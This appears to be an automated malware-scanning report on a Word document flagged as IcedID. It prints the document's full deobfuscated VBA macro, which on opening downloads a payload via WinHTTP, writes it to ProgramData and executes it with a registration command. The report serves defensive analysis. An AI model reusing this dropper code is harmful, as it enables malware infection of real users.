MALICIOUS
290
Risk Score
Heuristics 7
-
ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Set sOftw = CreateObject(EozAc + "." + "shell") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set tRcbJ = VBA.CreateObject(LmSbJ + "" + xAmKA) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 13270 bytes |
SHA-256: fb87660755d9eb949da2a0b16022d9685f73b37a5a9b73e0072e64618f8ac8a4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "cBrgv"
Sub rblrj(auLMT, Optional ByVal cqSZq As String = "c:\programdata\IXGTg.txt", Optional ByVal xAmKA As String = "systemobject")
' Proclivities celebrant retailer succinctness
' Independent economise clogging backbones
' Wont divergence stigma
' Mara synthesisers phoner repetitions
' Uptotheminute reasoners barbarous
' Nervous sightseers recklessness
' Obstructing sickens deviousness bowels differently cuddliness
' Commendations unalike paradigmatic converter enchantingly
' Murderers
' Biasses secretly
' Pelt verdant greenfly refractory
' Supertankers distrustful coke adroit
' Cladding rightward stalker persecutions capsizes equilibria thickens
' Civilised pruners arsenide bullfinch strontium
' Girths structuralist timeframe
' Sneakier
' Quantification condemnation quackish
' Cleared singleness footstep colony willynilly
' Macro vials teasing
' Intransitive removing interchanged pooches heterogeneous kitted
' Idaho swazi quiveringly paris reminiscences
Set tRcbJ = VBA.CreateObject(LmSbJ + "" + xAmKA)
' Irregular unsentimental converter whacko matrimonially
' Tachograph spoonful
' Calorimeters underpinning irreversibly
' Gauls disturbingly
' Abounds etymologies
Set njDIL = tRcbJ.CreateTextFile(cqSZq)
' Gongs coathanger
' Cashed fixate
' Instance fishhook authorities
' Alpha ascertain heralds soiled
' Inspecting tilts
njDIL.WriteLine auLMT
' Schnapps earths stereotypical pasteurised
' Unnoticed carpentry
' Jargons renew
' Streptococci
' Blower riches remitting
' Protestors egrets assyria pettishly exiling
' Unfurls limbo uteri
njDIL.Close
' Planning toiling voter totalitarian
' Conglomerates acquisitiveness unrehearsed blackboard crap wildoats
' Delivers abbreviation
' Fluke
' Hookah succeed gestate
' Markers bombardier boozed
' Primitive opium jejune bronchi ecology
' Stereographic descant
' Emergence referee
' Eigenstates
' Multiply gunsmiths refutations expunged
' Constrictor gruelling
' Explode startling
' Facial ineffective squeeze unrelenting
' Tried restlessly presences abbreviations matriculate
' Licentiate crater
' Dog
' Ranges synonymy resubmit backdrop displaces
' Certifying
' Pipits scuffling pederasts
' Intensified condensations toothless intones
' Giant grammatically glare tangy follicular
' Attachable contouring lifestyles livestock
' Clumped haphazard
' Charity dozes myopic
' Prefatory aground wardrobes
' Championed incuriously materialise reminisce benefiting ornately
' Warlords fidelity giving sonorous
' Vehement adhered
' Reintroductions
' Batch
' Thyroids phonological collating defaming balmoral
' Drawings shrewder martin
' Atropine mights
' Sluggard spacer regret amethystine stability
' Openly unrewarded lyres
' Providable helpmate naturalists diary
' Sublimity parallelograms rollers
' Chemise exponential
' Apostasy
' Unctuous gainers hardhearted
End Sub
' Vendettas reaping aglow
' Pounce omnipresent ruthlessness healths stepping
' Batches militates
' Interchangeable wag brilliancy
Sub AutoOpen()
' Supplements epileptics stinted seeing
' Crypts
' Anyplace siphons
' Woodwork unperturbed florins
' Eighties fording chatter typeface joking
' Aware peaks localities
' Passers outside featherweight
' Depoliticisation posers sublimated beeps floppiest
' We outsourcing corpus aspirant helpmate
' Rankling leggings
' Inexperience huckleberry teaser fabricate debacle derate
' Starched ghoul
' Spongy contributions
' Surefooted bespoke
' Beatitude
' Fixers undeniable kneecaps
' Naiads fastenings
' Erosion girth hunters topping subside
' Crept sexuality deponent grovelled hypermarkets
' Smiles
' Slope staving suppurating outstretched admittance
' Millipede humanoids
' Expostulate decustomised idaho
' Operational humorously
' Ratings unchartered pistols interpenetration satellite
' Quit classlessness astonishing
' Payment rapping concurrency scrutinising beam
' Convexity flakiest rheumatic drily offset
' Reflector speedometer egregious
Dim ZtADq As New XKcmz
' Dichotomy propitiating seethe
' Mosque timings
' Monetarists shatteringly cognizant
' Treasons extends
' Furry whirlpools convulsive
MqJVd = ""
' Chiding slacked conquistadores chore
' Tanking projections
' Bugler tussocky massacres poland
' Oversaw screed deprives tonedeaf overcooked
' Deplored hairs
' Pottage wrung painting
' Adipose
' Cautionary
' Compere harridan
' Vesicles facilitating intuitiveness sidesteps
' Mouthful implied supplanted pointlessly
auLMT = ZtADq.LeOal(LuGdo)
' Despoiling
' Penetrating unwedge practice wades greasepaint warmest
' Unbanning unprofitable peddled harassed
' Malls genome
' Doctors proliferative stabler resounded resounded
' Octant requisition
rblrj RAcFP(auLMT)
' Marshier
' Feeders
' Victimising consult gleans trends
' Upholstery wadis wheedled tropically strangles skimp
' Obedience graphology along pointy avail monophonic
' Unreported recaptured gulf elaborates
' Extensibility skewers mohair inquisitorially
' Gifting coolness pine pendants
' Slickness subprogram
' Airports footpads break tragically
' Kick
MGAFQ GlJiG(0) + "vr32 c:\programdata\IXGTg.txt", "wscript"
End Sub
Function LUvaB(CbtFf, qVGnh)
' Diplomat snowploughs covenanters
' Flogs shrill dimer
' Coarsens systolic stratified inaccessibility fending
' Battering perils cannot megawatt
LUvaB = Split(CbtFf, qVGnh)
End Function
Attribute VB_Name = "NQsvf"
' Prickle bewitched angels glycol
' Hounded ruffles
' Benighted blazer waffled
' Magnanimous virtues shuttered baseless mummified
Function RAcFP(jsRjD)
' Scrutineers watched untroubled maori renters xenon
' Ringleaders holier deviations
' Hindsight pointers profitable parachute restorations
' Catacombs rebuff managership
' Cuirass tip fishmongers
' Depositors each cochlear without boer medicated
RAcFP = StrConv(jsRjD, vbUnicode)
' Lurked nightingale
' Tenability donation espying
' Misfortunes
' Fretted stoppage hypothesiser workweek tea
End Function
' Pustule sureness derogations
' Purveyance wherefores spooked
' Goodbye keystrokes
' Repetitive ennobles oddjob
' Outrageous redundancy hotheaded gordian culmination
Function RNMur()
' Wildcat bandits mediating
' Raucous resonator steady distributable braking unscaled
' Peseta radiantly responder
' Fixture millenarianism creators dodgy
' Institutionalise crotchety hatful evidences
' Appropriates peaceful lobotomies
' Kilowatts leftover conquering barcode
' Circumcision fettered rural
With ActiveDocument.shapes(1)
RNMur = .AlternativeText
End With
End Function
' Paperthin condescends buys
' Droplet
' Hitchhiked skinflint propulsion
' Pincer
Function GlJiG(QaATG)
' Mercilessly connexion newt
' Spoiler froggy acquiescing unfits
' Epidemic conduits bodily centrists
' Owned disobeying soapbox
' Prevailed docility espied disquiet
' Overrepresented
' Manicured interruption level hoe
' Sabras spraining
' Tranches
' Derailing construction cyclops
' Typewriter
' Reshowing pry ski
FKbpO = LUvaB(RNMur(), "~~~")
sqURb = FKbpO(QaATG)
GlJiG = sqURb
End Function
Attribute VB_Name = "XKcmz"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function JYgep(fakev, aLUMi, kTjDK)
' Levitates shoelaces environments
' Shanks souk platitudinous recklessly
' Cash pulp situationist idioms unarguably anthology
' Stereographic onions
' Latest
' Clutching imprudently started deity offending disyllable pledged
JYgep = Mid(fakev, aLUMi, kTjDK)
End Function
Public Function bTBMI(trmIp, mRYMe)
' Outages floodlights robotic sons
' Easiness chinked lactation gymnast determinative sledge
' Intrinsically revivifying reprinted
' Milieus hairs adulterer
' Forfeiture sarong outfitters bricklaying
' Locked octave gale
' Fell
' Jut unimaginably subconscious
' Disquiet naples toughie blackbird
' Exclaims perplexities
' Disarm republic
' Hyphen insinuatingly irrigate lithosphere
' Acclamation etal translating multitudes sorrow
' Misadventure conformal skunks
' Rest overproduced
' Descriptively windfall
' Outliers fictional scudded reasonless deprive
yAZKP = Trim(trmIp)
For DspYC = mRYMe To Len(yAZKP)
DqnAu = JYgep(yAZKP, DspYC, mRYMe) & DqnAu
Next DspYC
bTBMI = DqnAu
End Function
' Restaurateurs misdiagnosis arthropods pleasingly controls
' Tableau oversee
' Illfated aversive
' Crocodiles incommoding truer
' Shrubbery
Function LeOal(LQELe)
' Disco tribute counterpane
' Punctured mummies jehad
' Tipple carve deeps induct
' Wagon sadism frugally
' Hydromagnetic debugging superpose licensed
' Computers maidenly
Dim WajvI As Object
' Krypton tuppences glower petrological wishful amiably
' Earthquake cloaca disintegrate blurring
' Obliquity
' Measure
' Unveiled southerners trap frailly ticketed paraboloid
' Ensign immutably waterproofed rugs noun ado
' Bicycling milked enzymatic bilingual pane
' Suggests hairdo fluster rental
' Nightfall emersion
' Wincing misfortune
Set WajvI = CreateObject(bTBMI(LQELe, 1) + "." + bTBMI(LQELe, 1) + "Request.5.1")
' Babel
' Individually prescriptions semiconscious meltdown
' Moiety consecutively dormer spottiest
' Chicks blackballing brig palp gorges
' Foment advancements frustratedly steamship
' Polyatomic smuts imparting
' Backside harbour modulating
' Smarter exothermically
' Sluggards
' Cornice grovelling seeable
' Restfulness chequer woodwork tripe
' Dilator integrable gimmicks contractions scavenged girls
' Turk unawed fibula
' Diameter ginger stack imaginings
' Stagnating ruggedly
' Servers stated retune
' Lumpier honshu tendered
' Leggings comparative reportage gazelles relieved
' Feminists review unaccompanied
' Harrowed stakeholders referencer muzzled
' Mistype microcosm paucity
Vrxyo = GlJiG(1)
' Chief cheeses aupair
' Theologists accretion crores
' Proofreading operettas weighed bottleneck invalidating complemented
' Miler hire adolescents flocking
' Leaderless
' Scurry vernier jumbles briskness coconuts bleeping
WajvI.Open "GET", bTBMI(Vrxyo, 1), False
' Rubbishing hydrolysis
' Diminution hyphenates decontaminating peels borough
' Relight indiscretions
' Filter spangle mundanely amateurish
' Fords unlabelled
' Excited floodlight
WajvI.Send
' Widened brittleness
' Catalogues exertions
' Ushers slanted
' Tanks goalscorer
' Tendons jobbing
' Array irrational ignored
LeOal = WajvI.responsebody
End Function
Attribute VB_Name = "nHXSE"
Public Const LuGdo As String = "ptthniw"
Public Const LmSbJ As String = "scripting.file"
Sub MGAFQ(YZipr, EozAc)
' Italian sinisterly
' Senseless overreached dowse superseding
' Execute paces incitement bidet
' Bookshelves memento countesses kinsmen saliva
' Pulsates snick
Set sOftw = CreateObject(EozAc + "." + "shell")
' Scrupulously combatant
' Bushfire overstatement rummages buns
' Vilify scarlet
' Emanations putting hotdogs imbiber jolly dawdle
' Leprosy remastered constructable depict
' Pore
' Skimmer unwise delight perplexed
' Thoroughfare regretful turntable rental spilling rarefactions
' Tenets coachload typhus
' Blur sleaziest headcount usable unevenly
' Matchplay antipathies facsimile sparred hoarfrost gnostic
' Macho ouster cheese unpredictable bagpiper mangler
' Photograph
' Constructivist recounts soaped
' Spilling fiftieth pertained ream
' Steamship moonrise saluted cloudburst sanatorium
' Chloroquine ordinances changer baboon
' Sandbank harassing thrower crackling
' Faun
' Prayerful sheltered allurement pretext fluffy
' Allotting necessity musical isthmus
' Touts mornings madness buffers
' Unwisest bashful solidity hulk anvil carets
' Slackening pink glinted forming pillowed thrilling
' Borrowable
' Tempera boreholes
' Hospitably iguanas supposing
' Firming emulsifies ironwork
' Polycyclic foxier
' Accretion teenyweeny rouses whittle
' Pencils low pentameters
' Dock inhumane blemishes croupier brushed sheared judged
' Automats interlacing dials
' Militating strokes gauged reopens
' Descended
' Firsts heavies glitzy replaced ridicule
' Complements buttock newsreel eking transmigration
' Ptolemy eland backhanded
' Moribundity ink dimpled abstinence
' Familiar portraying roasts revival
' Winningly unvoiced
' Fleecing traditionalists
' Offence hubris oddity cleaver enfeeble
' Painless whereby vacuously dulls
' Fumigating insensibly gates croatia zion jumping privatising
Call sOftw.exec(YZipr)
' Unsophistication wingspan
' Shampooing intimidating umbras unbounded
' Outwards moveable
' Pardoning slippery rendered bobbins squirearchy
' Kindergarten reclaimable busy restriction
' Parenthood angered loincloth buffetings
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 48128 bytes |
SHA-256: 7d453191b86924bf9bd367d0c8ee9be39a447f0f283d2c28aa023e883a772eec |
|||
|
Detection
ClamAV:
Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.